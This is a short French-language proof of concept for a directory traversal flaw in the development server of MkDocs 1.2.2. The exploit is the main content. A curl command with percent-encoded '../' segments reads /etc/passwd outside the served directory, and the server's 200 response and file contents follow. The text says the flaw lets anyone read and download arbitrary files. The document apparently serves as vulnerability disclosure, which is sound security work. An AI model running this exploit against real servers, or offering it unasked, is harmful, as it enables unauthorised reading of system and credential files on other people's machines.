
Preuve de concept pour le traversement de répertoire dans le serveur de développement intégré de MkDocs 1.2.2, permettant la lecture arbitraire de fichiers via un traversement de chemin encodé. Inclut des exemples de modèles curl et Nuclei.
Exploitation de traversée de répertoire du serveur de développement intégré de mkdocs
Mkdocs 1.2.2 permet une traversée de répertoire via le serveur de développement intégré qui répond sur le port 8000. Vous trouverez ci-dessous quelques exemples de chemins exploités avec succès :
Grâce à cette technique, il est possible de récupérer des fichiers en dehors du répertoire racine, permettant à quiconque de lire et de télécharger des fichiers arbitraires.



curl http://0.0.0.0:8000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -i
HTTP/1.0 200 OK
Date: Mon, 04 Oct 2021 02:13:38 GMT
Server: WSGIServer/0.2 CPython/3.7.3
Content-Type: application/octet-stream
Content-Length: 2187
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync...
